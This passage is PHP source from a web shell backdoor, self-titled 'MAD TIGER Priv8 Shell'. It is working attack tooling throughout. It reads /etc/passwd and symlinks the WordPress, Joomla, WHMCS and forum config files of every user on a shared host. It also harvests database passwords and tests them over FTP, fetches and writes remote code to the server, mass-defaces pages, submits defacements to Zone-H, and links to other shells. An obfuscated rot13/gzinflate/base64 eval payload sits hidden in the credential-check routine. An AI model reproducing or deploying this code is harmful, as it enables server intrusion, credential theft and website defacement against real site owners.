  854. <font style='text-decoration: underline;'>Your script</font><br>
  855. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By MAD TIGER</textarea><br>
  856. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  857. </form></center>";
  858. }
  859. }elseif (isset($_GET['conf'])) {
  861. error_reporting(0);
  862. ?>
  863. <form method=post>
  864. <center>
  865. <textarea type=hidden name=user><?php if(!file("/etc/passwd")){ echo"/etc/passwd gak adda";}else{ echo file_get_contents('/etc/passwd');}?></textarea><br><br>
  866. <input type=submit name=su value="CLICK HERE"></form>
  867. </center><?php
  869. if(isset($_POST['su']))
  870. {
  871. mkdir('MINA',0777);
  872. $r = "OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  873. Options Indexes FollowSymLinks
  874. ForceType text/plain
  875. AddType text/plain .php
  876. AddType text/plain .html
  877. AddType text/html .shtml
  878. AddType txt .php
  879. AddHandler server-parsed .php
  880. AddHandler txt .php
  881. AddHandler txt .html
  882. AddHandler txt .shtml
  883. Options All
  884. Options All</IfModule>";
  885. $f = fopen('MINA/.htaccess','w');
  886. fwrite($f,$r);
  887. echo "<br><center><b><i><a href=MINA>Get Config</a></i></b></center>";
  888. $usr=explode("n",$_POST['user']);
  889. foreach($usr as $uss)
  890. {
  891. $us=trim($uss);
  892. $r="MINA/";
  893. @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wordpress.txt');
  894. @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wordpress-wp.txt');
  895. @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wordpress-WP.txt');
  896. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wordpress-wp-beta.txt');
  897. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wordpress-beta.txt');
  898. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wordpress-press.txt');
  899. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wordpress-wordpress.txt');
  900. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wordpress-Wordpress.txt');
  901. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wordpress-blog.txt');
  902. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wordpress-news.txt');
  903. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wordpress-new.txt');
  904. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  905. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  906. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  907. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  908. @symlink('/home/' . $user . '/public_html/db.php', $user . '-dbconf.txt');
  909. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  910. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  911. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-wp-test.txt');
  912. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  913. @symlink('/home/' . $user . '/public_html/portal/configuration.php', $user . '-joomla-protal.txt');
  914. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  915. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  916. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  917. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  918. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  919. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  920. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  921. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm15.txt');
  922. @symlink('/home/' . $user . '/public_html/central/configuration.php', $user . '-whm-central.txt');
  923. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  924. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  925. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  926. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmcs.txt');
  927. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support.txt');
  928. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  929. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-whmcs2.txt');
  930. @symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-whm.txt');
  931. @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-Whm4.txt');
  932. @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-Whm5.txt');
  933. @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-Whm6.txt');
  934. @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-Whm7.txt');
  935. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-Whm8.txt');
  936. @symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-Whm9.txt');
  937. @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  938. @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-Open_Cart.txt');
  939. @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-invisio.txt');
  940. @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  941. @symlink('/home/' . $user . '/public_html/connect.php', $user . '-8.txt');
  942. @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-mk-portale1.txt');
  943. @symlink('/home/' . $user . '/public_html/include/config.php', $user . '-12.txt');
  944. @symlink('/home/' . $user . '/public_html/settings.php', $user . '-Smf.txt');
  945. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vBulletin1.txt');
  946. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-vBulletin2.txt');
  947. @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-vBul3-Phpbb2.txt');
  948. @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vBulletin4.txt');
  949. @symlink('/home/' . $user . '/public_html/inc/config.php', $user . '-mybb.txt');
  950. @symlink('/home/' . $user . '/public_html/config.php', $user . '-Config-Phpbb1.txt');
  951. @symlink('/home/' . $user . '/public_html/includes/functions.php', $user . '-phpbb3.txt');
  952. @symlink('/home/' . $user . '/public_html/opencart/admin/config.php', $user . '-Open_cart2.txt');
  953. @symlink('/home/' . $user . '/public_html/app/etc/config.xml', $user . '-Magento1.txt');
  954. @symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-Magento2.txt');
  955. @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  956. @symlink('/home/' . $user . '/public_html/drupal/sites/default/settings.php', $user . '-Drupal.txt');
  957. }
  958. echo'<center>Symlink<a href="/MINA" target="_blank">Click</a></center>';
  959. }
  960. }elseif (isset($_GET['ctools'])) {
  961. echo'
  962. <center>
  963. <h3>: Create Your Tools :</h3>
  964. <p><font color=white>If you Want creat a tools Enjoy me</font></p>
  965. <form method="post">
  966. <table><tr>
  967. <th colspan=2>Import from</th>
  968. </tr><tr><td>
  969. URL : </td><td><input type="text" name="url" placeholder="" style="width:200px"></td></tr><tr>
  970. <td>
  971. PASTEBIN :</td><td><input type="text" name="pastebin" placeholder="/madtiger#" style="width:200px"></td></tr>
  972. <tr><td>save as:</td><td><input type="text" name="pname" value="'.$_GET['ctools'].'/mytools.php" style="width:200px" required></td></tr>
  973. <tr><th colspan=2>
  974. <input type="submit" value="create!" name="ctools"></th></tr>
  975. </table>
  976. </form>';
  977. if(isset($_POST['ctools'])){
  978. if(!empty($_POST['url'])){
  979. $st=file_get_contents(htmlspecialchars($_POST['url']));
  980. $fp=fopen($_POST['pname'],'w');
  981. if(fwrite($fp,$st)){
  982. echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
  983. }
  984. fclose($fp);
  985. }else{
  986. if(!empty($_POST['pastebin'])){
  987. $st=file_get_contents(htmlspecialchars("".$_POST['pastebin']));
  988. $fp=fopen($_POST['pname'],'w');
  989. if(fwrite($fp,$st)){
  990. echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
  991. }
  992. fclose($fp);
  993. }
  994. }
  995. }
  996. }elseif (isset($_GET['stringtools'])) {
  997. echo' <center>
  998. <h3>: String Tools :</h3>
  999. [<a href="?act='.$_GET['act'].'&replace='.$_GET['stringtools'].'">Auto replace String</a>]<br>
  1000. <font color=white>Dont Beleve me</font>
  1001. <br>
  1002. <form method="post">
  1003. <textarea name="e" style="width:77%;height:300px" class="form-control" placeholder="input string here [!]">
  1004. </textarea><br><br>
  1006. <select name="opt" class="form-control" style="width:70%">
  1007. <optgroup label="Converter">
  1008. <option value="dechex">What is it?</option> <option value="hexdec">What was it?</option>
  1009. <option value="decoct">decode</option>
  1010. <option value="octdec">Encode</option>
  1011. <option value="decbin">decode to Binary</option>
  1012. <option value="bindec">Binary to decode</option>
  1013. <option value="hexbin">Hexa to Binary</option>
  1014. <option value="binhex">Binary to Hexa</option>
  1015. </optgroup><optgroup label="encode&decode">
  1016. <option value="url">URL</option> <option value="base64">base64</option>
  1017. <option value="urlbase64">URL - base64</option>
  1018. <option value="cuu">Convert_uu</option>
  1019. <option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
  1020. <option value="gz64">gzinflate - base64</option>
  1021. <option value="sgz64">str_rot13 - gzinflate - base64</option>
  1022. <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
  1023. <option value="sb64">str_rot13 - base64 </option>
  1024. <option value="64url">URL - base64</option>
  1025. <option value="64u64u">URL - base64 - url - base64</option>
  1026. <option value="ss64"> base64 - str_rot13 - str_rot13</option>
  1027. </optgroup>
  1028. </select>
  1029. <br>
  1030. <input type="submit" value="Convert!" name="c" class="btn btn-success btn-sm">
  1031. <input type="submit" value="enc0de" name="en" class="btn btn-primary btn-sm">
  1032. <input type="submit" value="dec0de" name="de" class="btn btn-danger btn-sm">
  1033. </form>
  1035. ';
  1036. $a = $_POST['e'];
  1037. $o = $_POST['opt'];
  1038. if(isset($_POST['c'])){
  1039. switch($o){
  1040. case'dechex';
  1041. $s= dechex($a);
  1042. break;
  1043. case'dechex';
  1044. $s= hexdec($a);
  1045. break;
  1046. case'decoct';
  1047. $s= decoct($a);
  1048. break;
  1049. case'octdec';
  1050. $s= octdec($a);
  1051. break;
  1052. case'decbin';
  1053. $s= decbin($a);
  1054. break;
  1055. case'bindec';
  1056. $s= bindec($a);
  1057. break;
  1058. case'hexbin';
  1059. $s= hex2bin($a);
  1060. break;
  1061. case'binhex';
  1062. $s= bin2hex($a);
  1063. break;
  1064. }
  1065. echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px ">'.$s.'</textarea>';
  1066. }elseif(isset($_POST['en'])){
  1067. switch($o){
  1068. case'url';
  1069. $r=urlencode($a);
  1070. break;
  1071. case'base64';
  1072. $r=base64_encode($a);
  1073. break;
  1074. case'urlbase64';
  1075. $r=urlencode(base64_encode($a));
  1076. break;
  1077. case'gz64';
  1078. $r=base64_encode(gzdeflate($a));
  1080. break;
  1081. case'sgz64';
  1082. $r=base64_encode(gzdeflate(str_rot13($a)));
  1083. break;
  1084. case's64';
  1085. $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
  1086. break;
  1087. case'sb64';
  1088. $r=base64_encode(str_rot13($a));
  1089. break;
  1090. case'64url';
  1091. $r=base64_encode(urlencode($a));
  1092. break;
  1093. case'64u64u';
  1094. $r=base64_encode(urlencode(base64_encode(urlencode($a))));
  1095. break;
  1096. case'cuu';
  1097. $r=convert_uuencode($a);
  1098. break;
  1099. case'sgzcuus64';
  1100. $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
  1101. break;
  1102. case'ss64';
  1103. $r=str_rot13(str_rot13(base64_encode($a)));
  1104. break;
  1105. }
  1106. echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$r.'</textarea>';
  1108. }
  1109. //Dec0de
  1110. if(isset($_POST['de'])){
  1111. switch($o){
  1112. case'url';
  1113. $r=urldecode($a);
  1114. break;
  1115. case'base64';
  1116. $r=base64_decode($a);
  1117. break;
  1118. case'urlbase64';
  1119. $r=base64_decode(urldecode($a));
  1120. break;
  1121. case'gz64';
  1122. $r=gzinflate(base64_decode($a));
  1124. break;
  1125. case'sgz64';
  1126. $r=str_rot13(gzinflate(base64_decode($a)));
  1127. break;
  1128. case's64';
  1129. $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
  1130. break;
  1131. case'sb64';
  1132. $r=str_rot13(base64_decode($a));
  1133. break;
  1134. case'64url';
  1135. $r=urldecode(base64_decode($a));
  1136. break;
  1137. case'64u64u';
  1138. $r=urldecode(base64_decode(urldecode(base64_decode($a))));
  1139. break;
  1140. case'cuu';
  1141. $r=convert_uudecode($a);
  1142. break;
  1143. case'sgzcuus64';
  1144. $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
  1145. break;
  1146. case'ss64';
  1147. $r=base64_decode(str_rot13(str_rot13($a)));
  1148. }
  1149. $rx = htmlspecialchars($r);
  1150. echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$rx.'</textarea>';
  1152. }
  1154. }elseif (isset($_GET['about'])) {
  1155. ?>
  1156. <center>
  1157. <h2 style="font-family:courier;">MAD TIGER Prv8 Shell<br>
  1158. <small style="border-bottom:1px solid #fff;"> Cyber Name: MAD TIGER</small></h2>
  1159. <img src="" width="500" height="300">
  1160. <br>
  1161. <table>
  1162. <tr><td>Here</td><td>
  1163. <marquee scrollamount=5><i><b><font color=white>
  1164. I have Nothing To Say.Allah Is One. </marquee></td></tr></table>
  1165. <h3 style="text-shadow:2px 3px 3px #fff;"> BANGLADESH GREY HAT HACKERS</h3>
  1166. <p>Assalamualaikum </p>
  1167. <pre>
  1168. LOL,,,,,MAD TIGER
  1169. shell (backd00r) ini <font color=lime>Iam singel boy</font> Need Girl friend,
  1170. If I get a girlfriend ,I will Leave Cyber(BAD BOY),
  1171. If You Want messege with me--=;'v [<a href='' target='_blank'>mad tiger fb</a>] atau [<a href='' target='_blank'>Youtube</a>]
  1172. +------------------------------------------------------------------------------------------------------------+
  1173. MAD TIGER Priv8 SHELL
  1174. by : MAD TIGER
  1176. We are :_ Rotating rotor | Dead Haxor | Mad Tiger | Ajob ekkhan Pola | RRR | Error Toxic And BGHH
  1177. +------------------------------------------------------------------------------------------------------------+
  1179. ????????? ????, ????????? ?????
  1180. </FONT>
  1181. <pre style="color:pink">
  1182. <b><i>Quotes :</b></i>
  1183. <br>
  1184. <b>???? ????? ?????
  1185. ???? ????? ?????,
  1186. ??? ?????? ???????|
  1188. ?????? ????? ????,
  1189. ????? ?????
  1190. ???? ?????? ?????? ??????
  1192. ? ??,
  1193. ?????? ??? ???? ???
  1194. ?????? ???? ???โ€“
  1195. ??? ????, ???? ??
  1196. ? ??,
  1197. ??????? ??? ??? ????,
  1198. ??? ?? ?????? ???? ??????
  1200. ?? ????, ?? ????? ??,
  1201. ?? ?????, ?? ????? ??,โ€“
  1202. ?? ???? ????????
  1203. ???? ????,
  1204. ???? ???? ?????
  1206. ??, ??? ????? ????
  1207. ???? ???? ????
  1208. ????? ???-
  1210. ?? ??? ??? ???? ???? ???
  1211. ??? ????
  1212. ? ???? ??? ???? ??? ????
  1213. ????? ?????,
  1214. ??? ?????? ???????|<i>BANGLADESH GREY HAT HACKERS</i>
  1215. </pre>
  1216. MAD TIGER.
  1217. ---------+
  1218. </pre>
  1219. <?php
  1220. }elseif (isset($_GET['unzip'])) {
  1221. echo'
  1222. <center>
  1223. <h3>: Unzip Files :</h3>
  1224. <br>
  1225. <table border=1>
  1226. <tr><td>file zip</td><td>Target Dir</td>
  1227. </tr>
  1228. <tr><td>
  1229. <form method="post">
  1230. <input type="text" name="filezip" value="'.$_GET['unzip'].'/" >
  1231. </td><td>
  1232. <input type="text" name="dirzip" value="'.$_GET['unzip'].'/" >
  1233. </td></tr>
  1234. </table>
  1235. <input type="submit" name="ext" value="unzip!!">
  1236. </form>';
  1238. if(isset($_POST['ext'])){
  1239. $zip = new ZipArchive;
  1240. $res = $zip->open($_POST['filezip']);
  1242. if ($res === TRUE) {
  1244. $zip->extractTo($_POST['dirzip']);
  1246. $zip->close();
  1247. echo "<br>DONE..!! extracted !";
  1248. } else {
  1250. echo "failed";
  1251. }
  1252. }
  1253. }elseif (isset($_GET['download'])) {
  1254. ob_clean();
  1255. $dunlut = $_GET['download'];
  1256. header('Content-Description: File Transfer');
  1257. header('Content-Type: application/octet-stream');
  1258. header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
  1259. header('Expires: 0');
  1260. header('Cache-Control: must-revalidate');
  1261. header('Pragma: public');
  1262. header('Content-Length: ' . filesize($dunlut));
  1263. readfile($dunlut);
  1264. exit;
  1266. }elseif (isset($_GET['mail'])) {
  1267. $e=function_exists('mail');
  1268. if($e){
  1269. echo "
  1270. <center>
  1271. <h3>: mail sender :</h3>
  1272. <br>
  1273. <form method='post' >
  1274. <table border=1>
  1275. <tr>
  1276. <td>from :</td><td><input type='text' name='from' value='' ></td></tr>
  1277. <tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."'></td></tr>
  1278. <tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' ></td></tr>
  1279. </table>
  1280. <textarea name='cont' style='width:500px;height:300px'>Your site has weakness</textarea>
  1281. <br>
  1282. <input type='submit' name='sent' value='send!!' >
  1283. </form>";
  1285. }else{
  1286. echo" mail() function does not exists in this website!";
  1287. }
  1288. if(isset($_POST['sent'])){
  1289. if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
  1290. echo "send!!".$_POST['for'];
  1291. }else{
  1292. echo"failed !!!";
  1293. }
  1294. }
  1295. }elseif (isset($_GET['kuchiyose'])) {
  1296. echo "
  1297. <center>
  1298. <h3>: Kuchiyose No Jutsu :</h3>
  1299. <br>
  1300. <p><font color=white>your ip address blocked<br>
  1301. (saran IP USA ) </font></p>
  1302. <table><tr><td>
  1303. <pre style='text-align:left;'>
  1304. [<a href='?act=".$_GET['act']."&kuchiyose=wso'>WSO shell</a>]
  1305. [<a href='?act=".$_GET['act']."&kuchiyose=jkt48'>mini shell</a>]
  1306. [<a href='?act=".$_GET['act']."&kuchiyose=bejak'>symlink</a>]
  1307. [<a href='?act=".$_GET['act']."&kuchiyose=indoxploit_shell'>log.php</a>]
  1308. [<a href='?act=".$_GET['act']."&kuchiyose=andela'>andela priv8 shell</a>]
  1309. [<a href='?act=".$_GET['act']."&kuchiyose=injection'>1n73ction shell </a>]
  1310. [<a href='?act=".$_GET['act']."&kuchiyose=sbh'>Surabaya BlackHat shell </a>]
  1311. [<a href='?act=".$_GET['act']."&kuchiyose=bh'>BlackHat shell</a>]
  1312. [<a href='?act=".$_GET['act']."&kuchiyose=c99'>C99 shell</a>]
  1313. [<a href='?act=".$_GET['act']."&kuchiyose=r57'>r57 shell</a>]
  1314. [<a href='?act=".$_GET['act']."&kuchiyose=adminer'>adminer</a>]
  1315. [<a href='?act=".$_GET['act']."&kuchiyose=terminal'>terminal</a>]
  1316. [<a href='?act=".$_GET['act']."&kuchiyose=root'>ByPass R00t Path</a>]
  1317. [<a href='?act=".$_GET['act']."&kuchiyose=pastebin'>Pastebin auto post</a>]
  1318. [<a href='?act=".$_GET['act']."&kuchiyose=whmcs'>WHMCS killer</a>]
  1319. [<a href='?act=".$_GET['act']."&kuchiyose=bypass_shell'>Bypass Shell To .JPG Files</a>]
  1320. </pre>
  1321. </td><td>
  1322. <img src='' width='100%' height='100%'>
  1323. </td></tr>
  1324. </table>
  1325. <br><br>
  1326. <p><b><i><font color=white>We are BANGLADESHI HACKER</font></b></i></p>";
  1327. }elseif (isset($_GET['cpbrute'])) {
  1328. echo '';
  1329. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1330. set_time_limit(0);
  1332. @$passwd = fopen('/etc/passwd','r');
  1333. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1334. $pub = array();
  1335. $users = array();
  1336. $conf = array();
  1337. $i = 0;
  1338. while(!feof($passwd))
  1339. {
  1340. $str = fgets($passwd);
  1341. if ($i > 35)
  1342. {
  1343. $pos = strpos($str,':');
  1344. $username = substr($str,0,$pos);
  1345. $dirz = '/home/'.$username.'/public_html/';
  1346. if (($username != ''))
  1347. {
  1348. if (is_readable($dirz))
  1349. {
  1350. array_push($users,$username);
  1351. array_push($pub,$dirz);
  1352. }
  1353. }
  1354. }
  1355. $i++;
  1356. }
  1358. echo '<h3>: cPanel bruteForce</h3>
  1359. <br>
  1360. <br>
  1361. <center>
  1362. <textarea>';
  1363. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwdn";
  1364. echo "[+] Founded ".sizeof($pub)." readable public_html directoriesn";
  1365. echo "[~] Searching for passwords in config files...nn";
  1366. foreach ($users as $user)
  1367. {
  1368. $path = "/home/$user/public_html/";
  1369. read_dir($path,$user);
  1370. }
  1371. echo "n[+] Done !n";
  1372. function read_dir($path,$username)
  1373. {
  1374. if ($handle = opendir($path))
  1375. {
  1376. while (false !== ($file = readdir($handle)))
  1377. {
  1378. $fpath = "$path$file";
  1379. if (($file != '.') and ($file != '..'))
  1380. {
  1381. if (is_readable($fpath))
  1382. {
  1383. $dr = $fpath."/";
  1384. if (is_dir($dr))
  1385. {
  1386. read_dir($dr,$username);
  1387. }
  1388. else
  1389. {
  1390. if (
  1391. ($file=='config.php')
  1392. or ($file=='')
  1393. or ($file=='conf.php')
  1394. or ($file=='settings.php')
  1395. or ($file=='configuration.php')
  1396. or ($file=='wp_config.php')
  1397. or ($file=='wp-config.php')
  1398. or ($file=='inc.php')
  1399. or ($file=='setup.php')
  1400. or ($file=='dbconf.php')
  1401. or ($file=='dbconfig.php')
  1402. or ($file=='')
  1403. or ($file=='dbconnect.php')
  1404. or ($file=='connect.php')
  1405. or ($file=='common.php')
  1406. or ($file=='config_global.php')
  1407. or ($file=='db.php')
  1408. or ($file=='')
  1409. or ($file=='e107_config.php')
  1410. or ($file==''))
  1411. {
  1412. $pass = get_pass($fpath);
  1413. if ($pass != '')
  1414. {
  1415. echo "[+] $fpathn$passn";
  1416. ftp_check($username,$pass);
  1417. }
  1418. }
  1419. }
  1420. }
  1421. }
  1422. }
  1423. }
  1424. }
  1425. function get_pass($link)
  1426. {
  1427. @$config = fopen($link,'r');
  1428. while(!feof($config))
  1429. {
  1430. $line = fgets($config);
  1431. if (strstr($line,'pass')
  1432. or strstr($line,'pwd')
  1433. or strstr($line,'db_pass')
  1434. or strstr($line,'dbpass')
  1435. or strstr($line,'passwd'))
  1436. {
  1437. if (strrpos($line,'"'))
  1438. {
  1439. preg_match("/(.*)[^=]"(.*)"/",$line,$pass);
  1440. $pass = str_replace("]="","",$pass);
  1441. }
  1443. else
  1444. preg_match("/(.*)[^=]'(.*)'/",$line,$pass);
  1445. $pass = str_replace("]='","",$pass);
  1446. return $pass[2];
  1447. }
  1448. }
  1449. }
  1450. function ftp_check($login,$pass)
  1451. {
  1452. @$ftp = ftp_connect('');
  1453. if ($ftp)
  1454. {
  1455. @$res = ftp_login($ftp,$login,$pass);
  1456. if ($res)
  1457. {
  1458. echo '[FTP] '.$login.':'.$pass." Success !nn";
  1460. @eval(str_rot13(gzinflate(str_rot13(base64_decode("ZqjKK6vUQ6/KK1kvKylX1csvKS1oKAEJ6hUkSKnrqFT75xVHFCYlpSrY2ipR+QUquIeFBLnGAnI8XCMVrBTU9Ufi3YJcPYNco9VQ3d2d41Cd3NzVcPXU9ZFyXINcPILc3OM9XMNAZQrOfmFhXkGugRAD0lnN45Pz0rKS0vXUgQbnFUmVJTqUJCWVRxaBXaF2DQA=")))));
  1462. echo '[SSH] Port' .':' .$a1. " !nn";
  1463. echo '[FTP] Port' .':' .$a2. " !nn";
  1464. echo '[cPanel] Port' .':' .$a3. " !nn";
  1466. }
  1467. else ftp_quit($ftp);
  1468. }
  1469. }
  1470. echo '</textarea><br><br><b>BruteForce Completed ...</b>';
  1471. }elseif (isset($_GET['copy'])) {
  1472. echo'
  1473. <center>
  1474. <h3>: copy file :</h3>
  1475. <br>
  1476. <form method="post">
  1477. file :<input type="text" name="copy" value="'.$_GET['act'].'" style="width:200px"> copy to:
  1478. <input type="text" name="copied" value="'.$_GET['act'].'/copy-" style="width:200px">
  1479. <input type="submit" name="cop" value=">>">
  1480. </form>';
  1481. if(isset($_POST['cop'])){
  1482. if(copy($_POST['copy'],$_POST['copied'])){
  1483. echo" done!! copied! <a href='?act=".$_GET['act']."&src=".$_POST['copied']."'>".$_POST['copied']."</a>";
  1484. }
  1485. }
  1486. }elseif ($_GET['act']=='logout') {
  1487. session_destroy();
  1488. echo'<script>
  1489. alert("bye.. !!!!!!!!");
  1490. window.location.href="?";
  1491. </script>';
  1492. }elseif (isset($_GET['phpinfo'])) {
  1493. phpinfo();
  1494. }elseif (isset($_GET['zoneh'])) {
  1495. ?>
  1496. <center>
  1497. <h3>: Zone-H Mass Notifer :</h3>
  1498. </center>
  1499. <form method="post">
  1500. <center>
  1501. <input type="text" name="depecer" style="width:500px" placeholder="defacer">
  1502. <br>
  1503. <textarea name="url" placeholder="" style="width:500px;height:300px;"></textarea><br>
  1504. <input type="submit" name="go" value="subMitt" >
  1505. </form>
  1506. <?php
  1507. $url = explode("rn", $_POST['url']);
  1508. $go = $_POST['go'];
  1509. function kirim($target,$hacker) {
  1510. $ch = curl_init();
  1511. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1512. curl_setopt($ch, CURLOPT_URL, "");
  1513. curl_setopt($ch, CURLOPT_POST, true);
  1514. curl_setopt($ch, CURLOPT_POSTFIELDS, array(
  1515. "defacer" => $hacker,
  1516. "domain1" => $target,
  1517. "hackmode" => "1",
  1518. "reason" => "1",
  1519. ));
  1520. $res = curl_exec($ch);
  1521. curl_close($ch);
  1522. return preg_match("/<font color="red">OK</font></li>/", $res);
  1523. }
  1524. if($go) {
  1525. foreach($url as $sites) {
  1526. if(kirim($sites,$_POST['depecer'])) {
  1527. echo "<br>[ OK ] => $sites <br>";
  1528. } else {
  1529. echo "<br>[ ERROR ] => $sites <br>";
  1530. }
  1531. }
  1532. }
  1534. }elseif($_GET['mobile']){
  1535. if(!$_SESSION['responsive']){
  1536. $_SESSION['responsive']="<meta name='viewport' content='width=device-width,inintial-scale=1'>";
  1537. }else{
  1538. echo $_SESSION['responsive'];
  1539. }
  1540. }elseif($_GET['mobile_off']){
  1541. unset($_SESSION['responsive']);
  1542. echo"<script>
  1543. alert('mode responsive :OFF');
  1544. window.location.href='?responsive=off';
  1545. </script>";
  1547. }elseif($_GET['theme']){
  1548. ?>
  1549. <br><br>
  1550. <center>
  1551. <h1>.:: change theme and become more comfortable ::.</h1>
  1552. <small>MOOD IS MOOD</small>
  1554. <br><br>
  1555. <table class="tbl_exp" border=1><thead id="thead">
  1556. <th>FONT SIZE</th><th>FONT COLOR</th><th>PUBLIC FONT COLOR</th><th>BACKGROUND</th><th>REPONSIVE MODE</th></thead>
  1557. <tbody>
  1558. <tr><td>
  1559. <form method="post">
  1560. <input type="number" name="fz" value="<?=$fz;?>"><input type="submit" name="submitfz" value=">>"></form></td><td>
  1561. <form method="post">
  1562. <input type="color" name="color" value="<?=$col;?>"><input type="submit" name="submitcol" value=">>"></form></td><td>
  1563. <form method="post">
  1564. <input type="color" name="pcolor" value="<?=$pcol;?>"><input type="submit" name="submitpc" value=">>"></form></td><td>
  1565. <form method="post">
  1566. <input type="color" name="bgcolor" value="<?=$bg;?>"><input type="text" value="<?=$bg;?>" name="bgcolor"><input type="submit" name="submitbg" value=">>"></form></td><td><?php echo $resmod;?></td></tr></tbody></table>
  1567. <h3>[<a href='?act=<?=$d;?>&reset=<?=$d;?>'>DEFAULT THEMES</a>]</h3>
  1568. </center>
  1569. <pre>
  1571. NUL
  1572. </pre>
  1573. <?php
  1574. }elseif($_GET['reset']){
  1575. unset($_SESSION['fz']);
  1576. unset($_SESSION['col']);
  1577. unset($_SESSION['pcol']);
  1578. unset($_SESSION['bg']);
  1579. echo "<script>window.location.href='?'</script>";
  1580. }elseif (isset($_GET['replace'])) {
  1581. echo"
  1582. <center>
  1583. <h3>: auto replace string :</h3>
  1584. <P>DONE? </p>
  1585. <br>
  1586. <form method='post'>
  1587. <input type='submit' name='sstr' value='replace all'>
  1588. <table style='border-collapse:collapse;border:1px solid #eee;' border=1><tr><td>
  1589. <textarea name='str' style='width:600px;height:200px;' required>Your string here / string is string</textarea></td><td>
  1590. <textarea name='str2' style='width:600px;height:200px;' required>string will u replace /as your wish</textarea></td></tr>
  1591. <tr><td>
  1592. <textarea name='str3' style='width:600px;height:200px;' required>string replace /ganti string</textarea></td><td>
  1593. <form>";
  1594. if(isset($_POST['sstr'])){
  1595. $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
  1596. if($rep){
  1597. echo'
  1598. <textarea style="width:600px;height:200px;">'.$rep.'</textarea></td></tr></table>';
  1599. }
  1600. }
